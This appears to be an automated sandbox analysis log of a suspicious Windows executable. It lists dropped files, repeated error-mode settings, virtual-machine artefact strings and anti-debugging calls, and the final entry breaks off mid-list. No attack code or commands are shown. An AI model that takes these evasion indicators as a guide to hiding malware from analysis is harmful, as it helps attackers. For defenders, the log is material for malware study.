Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]Jump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe API coverage: 9.7 %
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0041E42D FindFirstFileExW,0_2_0041E42D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0067E694 FindFirstFileExW,0_2_0067E694
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.0000000000838000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3@y
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0041B919 mov eax, dword ptr fs:[00000030h] 0_2_0041B919
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_00414C8F mov eax, dword ptr fs:[00000030h] 0_2_00414C8F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0066092B mov eax, dword ptr fs:[00000030h] 0_2_0066092B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0067BB80 mov eax, dword ptr fs:[00000030h] 0_2_0067BB80
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_00660D90 mov eax, dword ptr fs:[00000030h] 0_2_00660D90
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_00674EF6 mov eax, dword ptr fs:[00000030h] 0_2_00674EF6
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_007743DE push dword ptr fs:[00000030h] 0_2_007743DE
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_00402C60 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0040D949 SetUnhandledExceptionFilter,0_2_0040D949
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0040CD96 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD96
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0040D7B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D7B5
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0066DA1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0066DA1C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_006713E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006713E2
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0066DBB0 SetUnhandledExceptionFilter,0_2_0066DBB0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0066CFFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0066CFFD
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: 0_2_0040D9B3 cpuid 0_2_0040D9B3
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: EnumSystemLocalesW,0_2_00421135
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: EnumSystemLocalesW,0_2_00421180
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Code function: EnumSystemLocalesW,0_2_0042121B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004212A6
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00419BF4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_004214F9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0042161F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420E93
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00421725
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_0041972F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004217F4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_004451E9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0044C269
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getloc